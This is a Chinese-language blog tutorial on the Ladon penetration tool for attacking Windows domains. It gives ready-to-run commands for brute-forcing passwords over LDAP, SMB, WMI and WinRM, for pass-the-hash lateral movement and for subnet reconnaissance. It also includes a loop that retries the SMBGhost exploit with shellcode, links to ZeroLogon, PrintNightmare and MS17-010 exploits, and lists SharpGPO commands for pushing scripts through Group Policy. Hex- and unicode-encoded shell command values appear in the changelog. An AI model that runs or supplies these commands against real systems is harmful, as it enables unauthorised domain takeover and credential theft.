Ladon域渗透相关教程

ivi

k8gege [url=]K8实验室[/url] 2023-08-2013:37 发表于广西

收录于合集

#Ladon81个

#安全工具12个

#密码审计7个

#密码爆破4个

#域渗透1个

Ladon 11.5 20230812

1. [u]LdapScan      域控密码爆破成功 回显域信息
   
2. [u]OnlinePC     超时8s
   
3. [u]SmbInfo      超时8s
   
4. [u]WhatCms      超时8s
   
5. [u]SmbGhost      超时8s
   
6. [u]MS17010      超时8s
   
7. 
   
8. [+]LadonExp      CMD变量 $hexcmd$   $asciicmd$   $unicodecmd$ 使用对应编码加密命令
   
9. [+]LadonExp      Unicdoe加密通信Shell  cmd=\u006e\u0065\u0074\u0020\u0075\u0073\u0065\u0072
   
10. [+]LadonExp      Ascii码加密通信Shell  cmd=110,101,116,32,117,115,101,114
    
11. [+]LadonExp      Hex加密通信Shell    cmd=6E65742075736572
    
12. [+]PostShell    Unicdoe加密通信Shell  CMD值自动加密
    
13. [+]PostShell    Ascii码加密通信Shell(超出ASCII值范围不可解密)
    
14. [+]exe2hex      EXE转HEX，CMD命令Echo写入文件  支持指定长度、添加前缀
    
15. [+]exe2b64      EXE转Base64，CMD命令写入文件  支持指定长度、添加前缀

复制代码

什么是 LDAP？

LDAP 的全称是 Lightweight Directory Access Protocol，「轻量目录访问协议」。

划重点，LDAP 「是一个协议」，约定了Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容。而 「LDAP 协议的实现」，有着众多版本，例如微软的 Active Directory 是 LDAP 在 Windows 上的实现，AD 实现了LDAP 所需的树形数据库、具体如何解析请求数据并到数据库查询然后返回结果等功能。再例如 OpenLDAP 是可以运行在 Linux 上的 LDAP 协议的开源实现。而我们平常说的 LDAP Server，一般指的是安装并配置了 Active Directory、OpenLDAP 这些程序的服务器。

LDAP 协议能解决什么问题？

要说 LDAP 协议能解决什么问题，那不得不提 AD。AD 是 Windows 服务器上最强大的功能，AD 是基于 LDAP 协议的一套解决方案（LDAP 服务器 + 应用），解决了细粒度的权限控制。核心：「谁 以什么权限访问什么」。

用户服务

管理用户的域账号、用户信息、企业通信录（与电子邮箱系统集成）、用户组管理、用户身份认证、用户授权管理、按需实施组管理策略等。在 Windows 下，有组策略管理器，如果启用域用户认证，那么这些组策略可以统一管理，方便地限制用户的权限。

计算机管理

管理服务器及客户端计算机账户、所有服务器及客户端计算机加入域管理并按需实施组策略，甚至可以控制计算机禁止修改壁纸。（什么？给电脑重装系统就能解除限制？那么所有域上的资源都会无法访问了。）

资源管理

管理打印机、文件共享服务、网络资源等实施组策略。

应用系统的支持

对于电子邮件（Exchange）、在线及时通讯（Lync）、企业信息管理（SharePoint）、微软 CRM，ERP等业务系统提供数据认证（身份认证、数据集成、组织规则等）。这里不单是微软产品的集成，其它的业务系统根据公用接口的方式一样可以嵌入进来。

0x001 389端口  域控Ldap密码爆破(支持域外)

1. Ladon 192.168.1.8 LdapScan
   
2. Ladon 192.168.1.8/c LdapScan
   
3. Ladon noping 192.168.1.8 LdapScan

复制代码

不提供密码字典时，使用LdapScan只探测Ldap服务器

http://k8gege.org/Ladon/wmiexec2.html   其他协议探测域控信息

1. 
   
2. 系统信息探测
   
3. 136 Snmp协议探测操作系统、设备等信息
   
4. 
   
5. Ladon 192.168.1.8/24 SnmpInfo
   
6. 
   
7. 137 Nbt协议探测Windows主机名、域、用户
   
8. 
   
9. Ladon 192.168.1.8/24 NbtInfo
   
10. 
    
11. 138 Smb协议探测Windows版本、主机名、域
    
12. 
    
13. Ladon 192.168.1.8/24 SmbInfo
    
14. 
    
15. 139 Wmi协议探测Windows版本、主机名、域
    
16. 
    
17. Ladon 192.168.1.8/24 WmiInfo
    
18. 
    
19. 140 Mssql协议探测Windows版本、主机名、域
    
20. 
    
21. Ladon 192.168.1.8/24 MssqlInfo
    
22. 
    
23. 141 Winrm协议探测Windows版本、主机名、域
    
24. 
    
25. Ladon 192.168.1.8/24 WinrmInfo
    
26. 
    
27. 142 Exchange探测Windows版本、主机名、域
    
28. 
    
29. Ladon 192.168.1.8/24 ExchangeInfo
    
30. 
    
31. 143 Rdp协议探测Windows版本、主机名、域 使用单线程
    
32. 
    
33. Ladon 192.168.1.8/24 RdpInfo f=1
    

复制代码

Wmi探测信息

Winrm探测信息

Smb探测信息

Mssql探测信息

EnumMssql为探测SqlServer版本等信息

Exchange探测信息

提供密码时，将对指定IP或提供的IP列表或者C段\B段等进行密码审计

11.5爆破成功后，除了高亮ISOK提示外，增加LDAP信息

0x002 打印机漏洞CVE-2021-1675域控远程提权

http://k8gege.org/p/CVE-2021-1675.html

环境: Win2016

0x003 ZeroLogon CVE-2020-1472域控远程提权(密码置空)

http://k8gege.org/Ladon/cve-2020-1472.html

• 
  

LadonZeroLogon dc.k8gege.org

0x004 MS17010永恒之蓝漏洞远程提权  445端口

http://k8gege.org/p/89f3c60.htmlPowerShell EXP

http://k8gege.org/p/68a8bf1b.html   SMB溢出工具zzz

http://k8gege.org/Ladon/cmddll.html  ms17010 DLL生成器

http://k8gege.org/p/k8ms17010exp.html  NSA原版工具一键

0x005  SMBGhost永恒之黑CVE-2020-0796漏洞远程提权

http://k8gege.org/p/smbghost_cve_2020_0796.html

CVE-2020-0796漏洞影响运行Windows 10版本1903，Windows Server版本1903（服务器核心安装），Windows 10版本1909和Windows Server版本1909（服务器核心安装）的设备。根据Fortinet，其他Microsoft版本应受到影响。

Ladon稳定利用永恒之黑漏洞

由于该漏洞利用不稳定，成功运气从1次到100次不等，所以8.5新增ForExec循环执行漏洞利用功能，原版EXP需交互执行，批量在本地执行还好，但要在目标，比如只有shell的情况下执行就很麻烦了，所以我们需对EXP进行一个小修改，把交互式去掉，再使用Ladon调用，一直循环有可能会导致目标蓝屏，所以我们需要判定成功后不再执行以免目标蓝屏，EXP命令循环使用Ladon ForExec查看用法。

1. Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

复制代码

0x006 139端口 Netbios密码爆破(Windows)

1. Ladon 192.168.1.8/24 NbtScan

复制代码

0x007  445端口 Smb NtlmHash密码爆破

有时获取的hash无法解密，但可hash传递执行命令，所以我们也可以使用hash去登陆其它机器，通过hash横向移动获取其它机器权限。

1. Ladon 192.168.1.8/24 SmbScan

复制代码

0x008  445端口 Smb 明文密码爆破

NtlmHash都能验证，何况明文密码

1. Ladon 192.168.1.8/24 SmbScan

复制代码

0x009  135端口 Wmi NtlmHash密码爆破

1. Ladon 192.168.1.8/24 WmiScan

复制代码

0x010  135端口 Wmi 明文密码爆破

1. Ladon 192.168.1.8/24 WmiScan

复制代码

0x011 Ladon 自定义密码爆破 Impaket例子

http://k8gege.org/p/53177.html

调用修改过的smbexec.exe进行HASH密码验证

1. Ladon 192.168.1.1/24 smbhash.ini

复制代码

0x012 5985端口 Winrm密码爆破

Winrm远程命令/端口复用后门/WinrmCmd/密码爆破

http://k8gege.org/Ladon/WinrmScan.html

0x013 Ladon相关横向移动执行命令

http://k8gege.org/Ladon/SmbExec.html

http://k8gege.org/Ladon/wmiexec2.html

        

ID

      

模块名称

   

功能说明

   

用法

  
   

1

  

WmiExec

  

135端口执行命令

  

http://k8gege.org/Ladon/WinShell.html

   

2

  

PsExec

  

445端口执行命令

  

http://k8gege.org/Ladon/WinShell.html

   

3

  

AtExec

  

445端口执行命令

  

http://k8gege.org/Ladon/WinShell.html

   

4

  

SshExec

  

22端口执行命令

  

http://k8gege.org/Ladon/WinShell.html

   

5

  

JspShell

  

Jsp一句话执行命令

  

http://k8gege.org/p/ladon_cs_shell.html

   

6

  

WebShell

  

WebShell执行命令

  

http://k8gege.org/Ladon/webshell.html

   

7

  

WinrmExec

  

5895端口执行命令

  

http://k8gege.org/Ladon/WinrmExec.html

   

8

  

SmbExec

  

445端口HASH执行命令

  

http://k8gege.org/Ladon/SmbExec.html

当然如果域控上安装有mssql或ssh，也可通过对应协议横向渗透

0x014 DNS查询域内机器、IP (条件域内，指定域控IP)

1. Ladon AdiDnsDump 192.168.1.8

复制代码

0x015 SharpGPO组策略下发执行脚本

https://github.com/FSecureLABS/SharpGPOAbuse
https://github.com/Dliv3/SharpGPO

1. Ladon SharpGPO

复制代码

1. 
   
2.         Ladon SharpGPO -h
   
3. 
   
4.         # OU Operations
   
5.         Ladon SharpGPO --Action GetOU
   
6.         Ladon SharpGPO --Action GetOU --OUName "IT Support"
   
7. 
   
8.         Ladon SharpGPO --Action NewOU --OUName "IT Support"
   
9.         Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"
   
10. 
    
11.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
    
12.         Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"
    
13. 
    
14.         Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
    
15.         Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"
    
16. 
    
17.         # GPO Operations
    
18.         Ladon SharpGPO --Action GetGPO
    
19.         Ladon SharpGPO --Action GetGPO --GPOName testgpo
    
20. 
    
21.         Ladon SharpGPO --Action NewGPO --GPOName testgpo
    
22. 
    
23.         Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
    
24.         Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
25. 
    
26.         Ladon SharpGPO --Action GetGPLink
    
27.         Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
    
28.         Ladon SharpGPO --Action GetGPLink --GPOName testgpo
    
29.         Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
30. 
    
31.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
    
32.         Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
33. 
    
34.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
    
35.         Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
36. 
    
37.         Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
    
38.         Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
    
39. 
    
40.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
    
41.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
    
42.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
    
43.         Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
    
44.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
    
45.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
    
46.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
    
47.         Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
    
48. 
    
49.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
    
50.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
    
51.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
    
52.         Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
    
53.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
    
54.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
    
55.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
    
56.         Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

复制代码

Ladon简明使用教程245例

https://github.com/k8gege/Ladon